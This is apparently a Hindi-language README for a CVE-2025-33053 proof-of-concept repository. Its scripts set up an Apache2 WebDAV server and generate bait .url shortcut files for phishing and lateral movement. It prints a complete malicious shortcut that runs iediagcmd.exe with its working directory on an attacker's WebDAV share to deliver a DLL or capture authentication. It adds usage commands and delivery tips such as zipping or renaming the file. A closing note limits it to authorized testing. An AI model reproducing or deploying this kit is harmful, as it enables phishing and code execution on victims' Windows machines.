
CVE-2025-33053 प्रूफ ऑफ कॉन्सेप्ट (PoC)
यह रिपॉजिटरी Apache2 का उपयोग करके Ubuntu पर स्वचालित रूप से WebDAV सर्वर तैनात करने, और फिशिंग, रेड टीमिंग या लेटरल मूवमेंट सिमुलेशन में उपयोग के लिए दुर्भावनापूर्ण .url शॉर्टकट फ़ाइलें उत्पन्न करने के लिए स्क्रिप्ट प्रदान करती है।
setup_webdav.sh – Apache2 + WebDAV कॉन्फ़िगर करने के लिए Bash स्क्रिप्ट।setup_webdav.py – उपरोक्त का Python संस्करण।gen_url.py – UNC/WebDAV पथों के साथ .url शॉर्टकट फ़ाइलें उत्पन्न करने के लिए Python स्क्रिप्ट।README.md – दस्तावेज़ीकरण।sudo)sudo bash setup_webdav.sh
या Python का उपयोग करके:
sudo python3 setup_webdav.py
डिफ़ॉल्ट रूप से, स्क्रिप्ट निम्नलिखित करेगी:
/var/www/webdav पर एक साझा निर्देशिका बनाना।DAV और DAV_FS मॉड्यूल सक्षम करना।DavLockDB निर्देशिका बनाना (Apache DAV लॉकिंग त्रुटियों को रोकने के लिए)।📎 WebDAV पथ:
http://<your-ip>/webdav/
.url शॉर्टकट उत्पन्न करनाpython3 gen_url.py --ip 192.168.1.100 --out doc.url
python3 gen_url.py \
--ip 《YOUR IP ADDRESS》\
--share 《YOUR SHARE NAME》(Default: webdav) \
--out 《YOUR OUTPUT FILENAME.url》(Default: bait.url) \
--exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
--icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
--index 13 \
--modified 20F06BA06D07BD014D
यह निम्नानुसार एक .url फ़ाइल बनाएगा:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.100\webdav\
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D
📌 इस फ़ाइल पर क्लिक करने से (कुछ कॉन्फ़िगरेशन में) लक्ष्य सिस्टम आपके WebDAV सर्वर से स्वतः कनेक्ट हो सकता है (प्रमाणीकरण या DLL वितरण)।
sudo ufw allow 80
.url फ़ाइलें निम्नलिखित पर निर्भर करते हुए अपेक्षित रूप से निष्पादित नहीं हो सकती हैं:
.url को ज़िप करने या .txt में नाम बदलने की आवश्यकता हो सकती है।यह रिपॉजिटरी केवल शैक्षिक और अधिकृत पेनिट्रेशन परीक्षण के लिए है।
इन स्क्रिप्ट का उपयोग उन सिस्टमों के विरुद्ध न करें जिनके आप स्वामी नहीं हैं या जिनका परीक्षण करने की अनुमति नहीं है।
प्रश्नों या नैतिक रेड टीमिंग अनुरोधों के लिए, GitHub issues के माध्यम से संपर्क करें।